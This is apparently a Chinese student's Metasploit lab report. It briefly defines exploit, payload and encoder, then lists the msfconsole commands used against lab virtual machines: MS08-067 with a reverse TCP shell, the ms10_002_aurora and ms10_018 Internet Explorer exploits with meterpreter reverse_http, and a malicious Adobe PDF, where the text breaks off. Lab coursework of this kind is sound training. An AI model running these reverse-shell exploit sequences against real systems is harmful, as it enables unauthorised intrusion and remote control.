Exp5 MSF基础应用王秀飞20154318

Exp5 MSF基础应用

一、基础知识回答

用自己的话解释什么是exploit,payload,encode
exploit：使用不同的漏洞，与靶机进行连接，是攻击靶机的最后一步。老师说如同航天飞船的火箭本身一般。
payload：是有效载荷，后面一般加要对靶机进行攻击的代码，可以实现任何运行在受害者环境中的程序所能做的事情。老师说如火箭里面的载物。
encode：编码器，对代码进行异或运算、去除坏字符等等，保护payload不被发现。

二、实践过程

这次实验是用自己和同学的电脑做（自己的电脑太卡了，走一步一分钟，实在受不了，做到第二个实验就开始用同学电脑做，所以ip会有差异），但是端口号之类的是自己的信息。

1.Windows服务渗透攻击——MS08-067安全漏洞

MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统，包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本，甚至还包括测试阶段的Windows 7 Pro-Beta。在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上，攻击者可能未经身份验证即可利用此漏洞运行任意代码。此漏洞可能用于进行蠕虫攻击。
我们利用这个模块进行主动攻击。
调用该模块，并且查看可以使用的payload

use exploit/windows/smb/ms08_067_netapi
show payloads 查看需要设置的信息
set payload generic/shell_reverse_tcp 设置payload，tcp反向回连
set LHOST 192.168.174.132 攻击机kali ip
set LPORT 4318攻击端口
set RHOST 192.168.174.133靶机winxp ip
set target 0自动选择目标系统类型，匹配度较高
show options看一下配置是否都正确

最后exploit，监听

成功之后用dir查看

2. MS10_002_aurora和ms10_018漏洞攻击

ms10_002台风漏洞是IE浏览器漏洞，也是黑客挂马利用的最热门漏洞。

use windows/browser/ms10_002_aurora 调用该模块
set payload windows/meterpreter/reverse_http 设置http反向回连
set LHOST 192.168.173.132 主机kali的ip
set LPORT 4318 端口号
set URIPATH 4308zss设置统一资源标识符路径

然后开始监听exploit，成功生成网址：

然后去windows上进行ie的网页访问，结果我发现网页崩溃了，一次次的崩溃，我也崩溃了！

到这，我的电脑太慢我就不忍了，换了同学的电脑。ip如下。

但是我发现以上这个漏洞依旧崩溃，所以我放弃这个漏洞，于是转而去找另一个漏洞：ms10_018

漏洞的利用原理上都是一样的，设置好信息之后，我们进行监听并选择sessions：

3.针对Adobe的攻击

use exploit/mulit/fileformat/adobe_cooltype_sing选用某adobe模块
set payload windows/meterpreter/reverse_tcp设置tcp反向回连
set FILENAME 4318wxf.pdf 设置文件名
set LHOST
set LPORT